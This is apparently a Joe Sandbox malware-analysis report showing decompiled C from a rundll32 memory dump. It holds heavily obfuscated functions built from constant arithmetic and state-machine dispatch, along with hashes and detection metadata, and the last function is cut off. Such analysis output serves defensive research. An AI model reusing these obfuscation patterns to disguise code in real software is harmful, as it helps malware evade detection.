                                                                                                                      0x001809bd
                                                                                                                      0x001809c0
                                                                                                                      0x001809c4
                                                                                                                      0x001809c9
                                                                                                                      0x001809d1
                                                                                                                      0x001809d9
                                                                                                                      0x001809e9
                                                                                                                      0x001809ed
                                                                                                                      0x001809f5
                                                                                                                      0x001809fd
                                                                                                                      0x00180a0a
                                                                                                                      0x00180a0d
                                                                                                                      0x00180a11
                                                                                                                      0x00180a19
                                                                                                                      0x00180a21
                                                                                                                      0x00180a26
                                                                                                                      0x00180a2e
                                                                                                                      0x00180a36
                                                                                                                      0x00180a43
                                                                                                                      0x00180a47
                                                                                                                      0x00180a4f
                                                                                                                      0x00180a54
                                                                                                                      0x00180a5c
                                                                                                                      0x00180a64
                                                                                                                      0x00180a6c
                                                                                                                      0x00180a70
                                                                                                                      0x00180a78
                                                                                                                      0x00180a80
                                                                                                                      0x00180a85
                                                                                                                      0x00180a8d
                                                                                                                      0x00180a95
                                                                                                                      0x00180a9d
                                                                                                                      0x00180aa5
                                                                                                                      0x00180aad
                                                                                                                      0x00180aba
                                                                                                                      0x00180abd
                                                                                                                      0x00180ac1
                                                                                                                      0x00180ac9
                                                                                                                      0x00180ad9
                                                                                                                      0x00180ae1
                                                                                                                      0x00180ae6
                                                                                                                      0x00180aea
                                                                                                                      0x00180af2
                                                                                                                      0x00180afa
                                                                                                                      0x00180b02
                                                                                                                      0x00180b0d
                                                                                                                      0x00180b12
                                                                                                                      0x00180b16
                                                                                                                      0x00180b1e
                                                                                                                      0x00180b26
                                                                                                                      0x00180b2e
                                                                                                                      0x00180b36
                                                                                                                      0x00180b3e
                                                                                                                      0x00180b46
                                                                                                                      0x00180b4e
                                                                                                                      0x00180b56
                                                                                                                      0x00180b5e
                                                                                                                      0x00180b71
                                                                                                                      0x00180b75
                                                                                                                      0x00180b7d
                                                                                                                      0x00180b85
                                                                                                                      0x00180b8d
                                                                                                                      0x00180b95
                                                                                                                      0x00180b9d
                                                                                                                      0x00180ba5
                                                                                                                      0x00180bad
                                                                                                                      0x00180bb5
                                                                                                                      0x00180bbd
                                                                                                                      0x00180bc6
                                                                                                                      0x00180bca
                                                                                                                      0x00180bd2
                                                                                                                      0x00180bda
                                                                                                                      0x00180bdf
                                                                                                                      0x00180bec
                                                                                                                      0x00180bf0
                                                                                                                      0x00180bf8
                                                                                                                      0x00180c00
                                                                                                                      0x00180c08
                                                                                                                      0x00180c0d
                                                                                                                      0x00180c15
                                                                                                                      0x00180c1d
                                                                                                                      0x00180c1d
                                                                                                                      0x00180c2b
                                                                                                                      0x00000000
                                                                                                                      0x00180d2a
                                                                                                                      0x00180c37
                                                                                                                      0x00180c84
                                                                                                                      0x00180c96
                                                                                                                      0x00180c9b
                                                                                                                      0x00180c9e
                                                                                                                      0x00180ca1
                                                                                                                      0x00180ca3
                                                                                                                      0x00180cbb
                                                                                                                      0x00180ccc
                                                                                                                      0x00180ccf
                                                                                                                      0x00180cd4
                                                                                                                      0x00180cd7
                                                                                                                      0x00000000
                                                                                                                      0x00180cd7
                                                                                                                      0x00180c39
                                                                                                                      0x00180c3f
                                                                                                                      0x00180c7d
                                                                                                                      0x00000000
                                                                                                                      0x00180c41
                                                                                                                      0x00180c47
                                                                                                                      0x00000000
                                                                                                                      0x00180c4d
                                                                                                                      0x00180c61
                                                                                                                      0x00180c66
                                                                                                                      0x00180c6b
                                                                                                                      0x00180c6e
                                                                                                                      0x00180c73
                                                                                                                      0x00180c79
                                                                                                                      0x00000000
                                                                                                                      0x00180c79
                                                                                                                      0x00180c73
                                                                                                                      0x00180c47
                                                                                                                      0x00180c3f
                                                                                                                      0x00180d32
                                                                                                                      0x00000000
                                                                                                                      0x00180d32
                                                                                                                      0x00180ce8
                                                                                                                      0x00180cec
                                                                                                                      0x00180cf1
                                                                                                                      0x00180cf4
                                                                                                                      0x00180cf7
                                                                                                                      0x00180cf9
                                                                                                                      0x00180d05
                                                                                                                      0x00000000
                                                                                                                      0x00180cfb
                                                                                                                      0x00180cfb
                                                                                                                      0x00000000
                                                                                                                      0x00180cfb
                                                                                                                      0x00000000
                                                                                                                      0x00180d07
                                                                                                                      0x00180d07
                                                                                                                      0x00180d07
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 34$BG?$_2$`E*$f\
                                                                                                                      • API String ID: 0-782548322
                                                                                                                      • Opcode ID: cb5bf809f2ae41bd07a9f6dd2e611600e8f10190dfbc9bc8b936a4f4f13bace1
                                                                                                                      • Instruction ID: b09c46857c4a538689416fc1fdea42a41aa2a82866d4ff6a351826bc8760c4b7
                                                                                                                      • Opcode Fuzzy Hash: cb5bf809f2ae41bd07a9f6dd2e611600e8f10190dfbc9bc8b936a4f4f13bace1
                                                                                                                      • Instruction Fuzzy Hash: 5EA150B29087419FC388DF64C88980BFBE1BBC8758F408A1DF49996260D7B5DA48CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0018561F Relevance: 6.4, Strings: 5, Instructions: 189COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E0018561F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				void* _t181;
				signed int _t191;
				void* _t203;
				signed int _t204;
				signed int _t205;
				void* _t208;
				signed int _t218;
				intOrPtr* _t219;
				void* _t220;
				signed int* _t223;

				_t219 = _a8;
				_push(_t219);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0017CF25(_t181);
				_v4 = _v4 & 0x00000000;
				_t223 =  &(( &_v92)[4]);
				_v12 = 0x6615d4;
				_v8 = 0x63ffda;
				_t220 = 0;
				_v28 = 0xf9afd3;
				_t208 = 0x31efc18;
				_v28 = _v28 >> 7;
				_v28 = _v28 ^ 0x0001f35e;
				_v80 = 0xd84a57;
				_v80 = _v80 << 3;
				_t204 = 0x18;
				_v80 = _v80 * 0x2a;
				_v80 = _v80 + 0x45cf;
				_v80 = _v80 ^ 0x1be1d7fe;
				_v84 = 0xce5c8a;
				_v84 = _v84 + 0xa551;
				_v84 = _v84 * 0x57;
				_v84 = _v84 | 0xfd3f873a;
				_v84 = _v84 ^ 0xff78090e;
				_v52 = 0xb08f91;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 + 0xb2fa;
				_v52 = _v52 ^ 0x000b6173;
				_v56 = 0x674ce5;
				_v56 = _v56 + 0x398f;
				_v56 = _v56 >> 0x10;
				_v56 = _v56 ^ 0x0001bfbd;
				_v88 = 0x67105a;
				_v88 = _v88 * 0x51;
				_v88 = _v88 ^ 0xbb721b0a;
				_v88 = _v88 ^ 0x493680b5;
				_v88 = _v88 ^ 0xd2dd6d54;
				_v60 = 0x6eef31;
				_v60 = _v60 << 6;
				_v60 = _v60 | 0x99e12062;
				_v60 = _v60 ^ 0x9bf73816;
				_v92 = 0x911a2f;
				_v92 = _v92 ^ 0xd10c2d91;
				_v92 = _v92 * 0x5e;
				_v92 = _v92 << 7;
				_v92 = _v92 ^ 0xdd366504;
				_v64 = 0x3fcb13;
				_v64 = _v64 >> 0xf;
				_v64 = _v64 * 6;
				_v64 = _v64 ^ 0x00005971;
				_v44 = 0xc7907a;
				_v44 = _v44 << 0xb;
				_v44 = _v44 >> 0xb;
				_v44 = _v44 ^ 0x000cecb3;
				_v24 = 0x5cb13a;
				_v24 = _v24 | 0x9101a275;
				_v24 = _v24 ^ 0x91595ccd;
				_v48 = 0x23abf4;
				_v48 = _v48 / _t204;
				_v48 = _v48 << 2;
				_v48 = _v48 ^ 0x0009bb3e;
				_v68 = 0x8d9eb5;
				_v68 = _v68 >> 0x10;
				_v68 = _v68 + 0xf044;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 ^ 0x000dd2f9;
				_v20 = 0x3507ed;
				_v20 = _v20 + 0xe3ac;
				_v20 = _v20 ^ 0x00302855;
				_v32 = 0xacaccb;
				_v32 = _v32 ^ 0xc0e60235;
				_t205 = 0x4e;
				_v32 = _v32 * 0x53;
				_v32 = _v32 ^ 0x583b0f23;
				_v36 = 0x7d6507;
				_v36 = _v36 + 0xffff02b5;
				_t191 = _v36;
				_t218 = _t191 % _t205;
				_v36 = _t191 / _t205;
				_v36 = _v36 ^ 0x0005008b;
				_v40 = 0xd19b6c;
				_v40 = _v40 | 0xa0bb2537;
				_v40 = _v40 + 0xffff1d7c;
				_v40 = _v40 ^ 0xa0fa32c2;
				_v72 = 0xc60854;
				_v72 = _v72 | 0x85b2e473;
				_v72 = _v72 + 0x7f84;
				_v72 = _v72 * 0x36;
				_v72 = _v72 ^ 0x423e0813;
				_v76 = 0xd43520;
				_v76 = _v76 + 0x4339;
				_v76 = _v76 + 0xffffe1a4;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 ^ 0x000c8c56;
				do {
					while(_t208 != 0x2557e54) {
						if(_t208 == 0x31efc18) {
							_t208 = 0xe841cef;
							continue;
						} else {
							if(_t208 == 0xa700901) {
								E0017B267(_a4, _t218, _v68,  &_v16, _v20, _t208, _v32, _t220, _v36, _v40, _t208, _v72, _v76, _v80);
								 *_t219 = _v16;
							} else {
								if(_t208 != 0xe841cef) {
									goto L11;
								} else {
									_t203 = E0017B267(_a4, _t218, _v84,  &_v16, _v52, _t208, _v56, 0, _v88, _v60, _t208, _v92, _v64, _v28);
									_t223 =  &(_t223[0xc]);
									if(_t203 != 0) {
										_t208 = 0x2557e54;
										continue;
									}
								}
							}
						}
						L14:
						return _t220;
					}
					_push(_t208);
					_push(_t208);
					_t220 = E00183512(_v16);
					if(_t220 == 0) {
						_t208 = 0x2fabbe9;
						goto L11;
					} else {
						_t208 = 0xa700901;
						continue;
					}
					goto L14;
					L11:
				} while (_t208 != 0x2fabbe9);
				goto L14;
			}




































                                                                                                                      0x00185626
                                                                                                                      0x0018562a
                                                                                                                      0x0018562b
                                                                                                                      0x0018562f
                                                                                                                      0x00185630
                                                                                                                      0x00185631
                                                                                                                      0x00185636
                                                                                                                      0x0018563b
                                                                                                                      0x0018563e
                                                                                                                      0x00185648
                                                                                                                      0x00185650
                                                                                                                      0x00185652
                                                                                                                      0x0018565a
                                                                                                                      0x0018565f
                                                                                                                      0x00185664
                                                                                                                      0x0018566c
                                                                                                                      0x00185674
                                                                                                                      0x00185680
                                                                                                                      0x00185681
                                                                                                                      0x00185685
                                                                                                                      0x0018568d
                                                                                                                      0x00185695
                                                                                                                      0x0018569d
                                                                                                                      0x001856aa
                                                                                                                      0x001856ae
                                                                                                                      0x001856b6
                                                                                                                      0x001856be
                                                                                                                      0x001856c6
                                                                                                                      0x001856cb
                                                                                                                      0x001856d3
                                                                                                                      0x001856db
                                                                                                                      0x001856e3
                                                                                                                      0x001856eb
                                                                                                                      0x001856f0
                                                                                                                      0x001856f8
                                                                                                                      0x00185705
                                                                                                                      0x00185709
                                                                                                                      0x00185711
                                                                                                                      0x00185719
                                                                                                                      0x00185721
                                                                                                                      0x00185729
                                                                                                                      0x0018572e
                                                                                                                      0x00185736
                                                                                                                      0x0018573e
                                                                                                                      0x00185746
                                                                                                                      0x00185753
                                                                                                                      0x00185757
                                                                                                                      0x0018575c
                                                                                                                      0x00185764
                                                                                                                      0x0018576c
                                                                                                                      0x00185776
                                                                                                                      0x0018577a
                                                                                                                      0x00185782
                                                                                                                      0x0018578a
                                                                                                                      0x0018578f
                                                                                                                      0x00185794
                                                                                                                      0x0018579c
                                                                                                                      0x001857a4
                                                                                                                      0x001857ac
                                                                                                                      0x001857b4
                                                                                                                      0x001857c2
                                                                                                                      0x001857c6
                                                                                                                      0x001857cb
                                                                                                                      0x001857d3
                                                                                                                      0x001857db
                                                                                                                      0x001857e0
                                                                                                                      0x001857e8
                                                                                                                      0x001857ed
                                                                                                                      0x001857f5
                                                                                                                      0x001857ff
                                                                                                                      0x0018580c
                                                                                                                      0x00185814
                                                                                                                      0x0018581c
                                                                                                                      0x0018582b
                                                                                                                      0x0018582c
                                                                                                                      0x00185830
                                                                                                                      0x00185838
                                                                                                                      0x00185840
                                                                                                                      0x00185848
                                                                                                                      0x0018584c
                                                                                                                      0x00185853
                                                                                                                      0x00185857
                                                                                                                      0x0018585f
                                                                                                                      0x00185867
                                                                                                                      0x0018586f
                                                                                                                      0x00185877
                                                                                                                      0x0018587f
                                                                                                                      0x00185887
                                                                                                                      0x0018588f
                                                                                                                      0x0018589c
                                                                                                                      0x001858a0
                                                                                                                      0x001858a8
                                                                                                                      0x001858b0
                                                                                                                      0x001858b8
                                                                                                                      0x001858c0
                                                                                                                      0x001858c5
                                                                                                                      0x001858cd
                                                                                                                      0x001858cd
                                                                                                                      0x001858d7
                                                                                                                      0x0018592d
                                                                                                                      0x00000000
                                                                                                                      0x001858d9
                                                                                                                      0x001858db
                                                                                                                      0x0018599c
                                                                                                                      0x001859ab
                                                                                                                      0x001858e1
                                                                                                                      0x001858e7
                                                                                                                      0x00000000
                                                                                                                      0x001858e9
                                                                                                                      0x00185919
                                                                                                                      0x0018591e
                                                                                                                      0x00185923
                                                                                                                      0x00185929
                                                                                                                      0x00000000
                                                                                                                      0x00185929
                                                                                                                      0x00185923
                                                                                                                      0x001858e7
                                                                                                                      0x001858db
                                                                                                                      0x001859ae
                                                                                                                      0x001859b6
                                                                                                                      0x001859b6
                                                                                                                      0x00185940
                                                                                                                      0x00185941
                                                                                                                      0x0018594b
                                                                                                                      0x00185951
                                                                                                                      0x0018595a
                                                                                                                      0x00000000
                                                                                                                      0x00185953
                                                                                                                      0x00185953
                                                                                                                      0x00000000
                                                                                                                      0x00185953
                                                                                                                      0x00000000
                                                                                                                      0x0018595f
                                                                                                                      0x0018595f
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 1n$9C$U(0$qY$Lg
                                                                                                                      • API String ID: 0-890920262
                                                                                                                      • Opcode ID: 3dd90d24197c6e0eb425be8a52b4512aac5aa0624a9b5daf25ccf20776c8ba82
                                                                                                                      • Instruction ID: 67f60df41d3ed36f9ff90439ebbf3b16dd4b5f09e2561f92aded31fe59294a60
                                                                                                                      • Opcode Fuzzy Hash: 3dd90d24197c6e0eb425be8a52b4512aac5aa0624a9b5daf25ccf20776c8ba82
                                                                                                                      • Instruction Fuzzy Hash: 94910DB14097819FC368DF65C58A91BFBF1FB94758F104A0DF2A596260D3B68A48CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0017C309 Relevance: 6.4, Strings: 5, Instructions: 174COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0017C309() {
				char _v524;
				signed int _v528;
				intOrPtr _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _t177;
				void* _t180;
				void* _t183;
				intOrPtr _t190;
				intOrPtr _t192;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int* _t213;

				_t213 =  &_v604;
				_v528 = _v528 & 0x00000000;
				_v532 = 0xe4831e;
				_t183 = 0x6eb28ed;
				_v552 = 0x1276c3;
				_v552 = _v552 ^ 0x42b4d72c;
				_v552 = _v552 + 0xf95f;
				_v552 = _v552 ^ 0x42a4cd0b;
				_v548 = 0x347a6a;
				_v548 = _v548 | 0x3256b11b;
				_v548 = _v548 ^ 0x3277037e;
				_v564 = 0x82dd46;
				_v564 = _v564 + 0xffffb28a;
				_v564 = _v564 << 0xf;
				_v564 = _v564 ^ 0x47e00e04;
				_v600 = 0xaa25ff;
				_v600 = _v600 << 0xd;
				_v600 = _v600 + 0xf5f3;
				_v600 = _v600 + 0xffff8f6c;
				_v600 = _v600 ^ 0x44cc5d5c;
				_v556 = 0x1132ac;
				_v556 = _v556 | 0x9b4d5b2d;
				_v556 = _v556 ^ 0x2eadc533;
				_v556 = _v556 ^ 0xb5fd7d8d;
				_v536 = 0x11628e;
				_v536 = _v536 * 0x4b;
				_v536 = _v536 ^ 0x051afcb6;
				_v584 = 0xa15265;
				_v584 = _v584 << 9;
				_t208 = 0x76;
				_v584 = _v584 / _t208;
				_t209 = 0x44;
				_v584 = _v584 * 0x30;
				_v584 = _v584 ^ 0x1b1be586;
				_v576 = 0xad5a3e;
				_v576 = _v576 | 0x6c06410f;
				_v576 = _v576 * 0xe;
				_v576 = _v576 ^ 0xf19bc2b8;
				_v540 = 0x7faa4f;
				_v540 = _v540 + 0xffff807e;
				_v540 = _v540 ^ 0x007d47f3;
				_v544 = 0x15cbe5;
				_v544 = _v544 | 0x222269e9;
				_v544 = _v544 ^ 0x2236b88c;
				_v592 = 0x7f48ca;
				_v592 = _v592 << 3;
				_v592 = _v592 / _t209;
				_v592 = _v592 | 0x6974e558;
				_v592 = _v592 ^ 0x697a9c68;
				_v568 = 0xdf464;
				_v568 = _v568 << 0xf;
				_v568 = _v568 | 0x68444ee0;
				_v568 = _v568 ^ 0xfa71a6c1;
				_v588 = 0x4eabc7;
				_v588 = _v588 >> 4;
				_v588 = _v588 ^ 0xdf4d904b;
				_v588 = _v588 + 0x3b02;
				_v588 = _v588 ^ 0xdf416162;
				_v596 = 0x2da8e3;
				_v596 = _v596 | 0xcaed8666;
				_v596 = _v596 + 0xffff0300;
				_v596 = _v596 ^ 0x5b73fee0;
				_v596 = _v596 ^ 0x9196765f;
				_v604 = 0x945bcd;
				_v604 = _v604 + 0xffffdd7c;
				_v604 = _v604 | 0x6dfc281c;
				_v604 = _v604 << 3;
				_v604 = _v604 ^ 0x6fe21eca;
				_v580 = 0xe4e766;
				_t122 =  &_v580; // 0xe4e766
				_t210 = 0x1c;
				_t177 =  *_t122 / _t210;
				_v580 = _t177;
				_v580 = _v580 + 0x73a9;
				_v580 = _v580 | 0xb028f1fa;
				_v580 = _v580 ^ 0xb0236f0a;
				_v572 = 0x26d4cb;
				_v572 = _v572 ^ 0xbda42e04;
				_v572 = _v572 << 8;
				_v572 = _v572 ^ 0x82f622a5;
				_v560 = 0x78c236;
				_v560 = _v560 | 0xc7202908;
				_v560 = _v560 >> 9;
				_v560 = _v560 ^ 0x0065a40e;
				do {
					while(_t183 != 0x6eb28ed) {
						if(_t183 == 0x7fdcf56) {
							return E00171950(_v580, _v572, __eflags, 0,  &_v524,  &_v524, E0018D3C8, _v560);
						}
						if(_t183 == 0xb7324ef) {
							_t177 = E00184FA8(_v588,  &_v524, _v596, _v604);
							 *_t177 = 0;
							_t183 = 0x7fdcf56;
							continue;
						}
						_t220 = _t183 - 0xb9bc25f;
						if(_t183 != 0xb9bc25f) {
							goto L8;
						}
						_push(_v600);
						_push(_v564);
						_push(0x1710cc);
						_t180 = E0017AB66(_v552, _v548, _t220);
						_t190 =  *0x19520c; // 0x0
						_t192 =  *0x19520c; // 0x0
						E0017E7CE(_t180, _t220, _v556, _t192 + 8, _t190 + 0x220, _v536, _v584, _v576, _v540, _t190 + 0x220);
						_t177 = E0017AE03(_v544, _v592, _v568, _t180);
						_t213 =  &(_t213[0xd]);
						_t183 = 0xb7324ef;
					}
					_t183 = 0xb9bc25f;
					L8:
					__eflags = _t183 - 0x6d02df3;
				} while (__eflags != 0);
				return _t177;
			}

































                                                                                                                      0x0017c309
                                                                                                                      0x0017c313
                                                                                                                      0x0017c31a
                                                                                                                      0x0017c322
                                                                                                                      0x0017c327
                                                                                                                      0x0017c32f
                                                                                                                      0x0017c337
                                                                                                                      0x0017c33f
                                                                                                                      0x0017c347
                                                                                                                      0x0017c34f
                                                                                                                      0x0017c357
                                                                                                                      0x0017c35f
                                                                                                                      0x0017c367
                                                                                                                      0x0017c36f
                                                                                                                      0x0017c374
                                                                                                                      0x0017c37c
                                                                                                                      0x0017c384
                                                                                                                      0x0017c389
                                                                                                                      0x0017c391
                                                                                                                      0x0017c399
                                                                                                                      0x0017c3a1
                                                                                                                      0x0017c3a9
                                                                                                                      0x0017c3b1
                                                                                                                      0x0017c3b9
                                                                                                                      0x0017c3c1
                                                                                                                      0x0017c3ce
                                                                                                                      0x0017c3d2
                                                                                                                      0x0017c3da
                                                                                                                      0x0017c3e2
                                                                                                                      0x0017c3ed
                                                                                                                      0x0017c3f2
                                                                                                                      0x0017c3fd
                                                                                                                      0x0017c3fe
                                                                                                                      0x0017c402
                                                                                                                      0x0017c40a
                                                                                                                      0x0017c412
                                                                                                                      0x0017c41f
                                                                                                                      0x0017c423
                                                                                                                      0x0017c42b
                                                                                                                      0x0017c433
                                                                                                                      0x0017c43b
                                                                                                                      0x0017c443
                                                                                                                      0x0017c44b
                                                                                                                      0x0017c453
                                                                                                                      0x0017c45b
                                                                                                                      0x0017c463
                                                                                                                      0x0017c46e
                                                                                                                      0x0017c472
                                                                                                                      0x0017c47a
                                                                                                                      0x0017c482
                                                                                                                      0x0017c48a
                                                                                                                      0x0017c48f
                                                                                                                      0x0017c497
                                                                                                                      0x0017c49f
                                                                                                                      0x0017c4a7
                                                                                                                      0x0017c4ac
                                                                                                                      0x0017c4b4
                                                                                                                      0x0017c4bc
                                                                                                                      0x0017c4c4
                                                                                                                      0x0017c4cc
                                                                                                                      0x0017c4d4
                                                                                                                      0x0017c4dc
                                                                                                                      0x0017c4e4
                                                                                                                      0x0017c4ec
                                                                                                                      0x0017c4f4
                                                                                                                      0x0017c4fc
                                                                                                                      0x0017c504
                                                                                                                      0x0017c509
                                                                                                                      0x0017c513
                                                                                                                      0x0017c520
                                                                                                                      0x0017c52b
                                                                                                                      0x0017c52c
                                                                                                                      0x0017c533
                                                                                                                      0x0017c537
                                                                                                                      0x0017c53f
                                                                                                                      0x0017c547
                                                                                                                      0x0017c54f
                                                                                                                      0x0017c557
                                                                                                                      0x0017c55f
                                                                                                                      0x0017c564
                                                                                                                      0x0017c56c
                                                                                                                      0x0017c574
                                                                                                                      0x0017c57c
                                                                                                                      0x0017c581
                                                                                                                      0x0017c589
                                                                                                                      0x0017c589
                                                                                                                      0x0017c597
                                                                                                                      0x00000000
                                                                                                                      0x0017c66f
                                                                                                                      0x0017c59f
                                                                                                                      0x0017c62e
                                                                                                                      0x0017c637
                                                                                                                      0x0017c63a
                                                                                                                      0x00000000
                                                                                                                      0x0017c63a
                                                                                                                      0x0017c5a1
                                                                                                                      0x0017c5a3
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0017c5a9
                                                                                                                      0x0017c5ad
                                                                                                                      0x0017c5b9
                                                                                                                      0x0017c5be
                                                                                                                      0x0017c5c3
                                                                                                                      0x0017c5e8
                                                                                                                      0x0017c5fd
                                                                                                                      0x0017c60f
                                                                                                                      0x0017c614
                                                                                                                      0x0017c617
                                                                                                                      0x0017c617
                                                                                                                      0x0017c641
                                                                                                                      0x0017c643
                                                                                                                      0x0017c643
                                                                                                                      0x0017c643
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Xti$f$jz4$NDh$i""
                                                                                                                      • API String ID: 0-1033842094
                                                                                                                      • Opcode ID: 939c6160161755bdc97a489d38a89f04fd9c60aec4ceaa9c481cf5673ea32a50
                                                                                                                      • Instruction ID: 1ded4f1488e0e1322a1f910ac922b6918c6a93c5d3ce2246912b2035906d23d9
                                                                                                                      • Opcode Fuzzy Hash: 939c6160161755bdc97a489d38a89f04fd9c60aec4ceaa9c481cf5673ea32a50
                                                                                                                      • Instruction Fuzzy Hash: 16812F711083419FC398CF65DA8A51FBBF1BBD4758F109A1DF29A96260D3B48A09CF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0018D3C8 Relevance: 6.4, Strings: 5, Instructions: 167COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0018D3C8(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v616;
				void* _t202;
				void* _t203;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				intOrPtr _t226;

				_v88 = _v88 & 0x00000000;
				_v96 = 0x9df3e3;
				_v92 = 0x111c87;
				_v84 = 0xa084f0;
				_v84 = _v84 | 0x40312458;
				_v84 = _v84 ^ 0x40bb7f3e;
				_v16 = 0xcefd9d;
				_v16 = _v16 + 0xcd96;
				_t210 = 0x6a;
				_v16 = _v16 * 0xf;
				_v16 = _v16 * 0x19;
				_v16 = _v16 ^ 0x30695f7a;
				_v40 = 0x424711;
				_v40 = _v40 + 0x2590;
				_v40 = _v40 ^ 0x3a2a5382;
				_v40 = _v40 | 0x2443fe5b;
				_v40 = _v40 ^ 0x3e6f608b;
				_v72 = 0x627874;
				_v72 = _v72 >> 0xf;
				_v72 = _v72 ^ 0x0000543e;
				_v32 = 0xe24590;
				_v32 = _v32 | 0xeb3a48f8;
				_v32 = _v32 << 7;
				_v32 = _v32 * 0x3c;
				_v32 = _v32 ^ 0x5522ca4e;
				_v48 = 0xd6f907;
				_v48 = _v48 << 1;
				_v48 = _v48 / _t210;
				_v48 = _v48 ^ 0x000b1c59;
				_v8 = 0xcfad9d;
				_v8 = _v8 << 0xa;
				_v8 = _v8 << 6;
				_v8 = _v8 + 0xffff7e6c;
				_v8 = _v8 ^ 0xad990d89;
				_v80 = 0x5a76f4;
				_v80 = _v80 << 1;
				_v80 = _v80 ^ 0x00be33e4;
				_v24 = 0x133aa1;
				_v24 = _v24 ^ 0xc65a4b7f;
				_v24 = _v24 * 0x1e;
				_v24 = _v24 * 0x13;
				_v24 = _v24 ^ 0x7f83be07;
				_v64 = 0x82e5fc;
				_v64 = _v64 + 0xffffc657;
				_v64 = _v64 ^ 0x008deef7;
				_v52 = 0x864f04;
				_v52 = _v52 << 0xd;
				_v52 = _v52 + 0xeb96;
				_v52 = _v52 ^ 0xc9ef9c56;
				_v20 = 0x197ff2;
				_v20 = _v20 + 0xffff42c2;
				_v20 = _v20 + 0x3e6b;
				_v20 = _v20 ^ 0xe022d7dd;
				_v20 = _v20 ^ 0xe031a9ca;
				_v68 = 0x51f027;
				_v68 = _v68 ^ 0xb9085631;
				_v68 = _v68 ^ 0xb9589630;
				_v56 = 0x8df2a2;
				_v56 = _v56 ^ 0x4cb2f0be;
				_v56 = _v56 ^ 0x0e08f962;
				_v56 = _v56 ^ 0x42319e50;
				_v12 = 0x46739a;
				_v12 = _v12 + 0x8337;
				_v12 = _v12 + 0xd158;
				_v12 = _v12 << 0xd;
				_v12 = _v12 ^ 0xf903dec7;
				_v36 = 0x3dfdbe;
				_v36 = _v36 * 0x2f;
				_t211 = 0x2a;
				_v36 = _v36 / _t211;
				_t212 = 0x45;
				_v36 = _v36 / _t212;
				_v36 = _v36 ^ 0x000da6e6;
				_v28 = 0x24761f;
				_v28 = _v28 << 9;
				_v28 = _v28 + 0xffffc268;
				_v28 = _v28 >> 8;
				_v28 = _v28 ^ 0x0040fbfa;
				_v60 = 0xc6a3a8;
				_v60 = _v60 + 0xffff6723;
				_v60 = _v60 * 0x24;
				_v60 = _v60 ^ 0x1bd7278b;
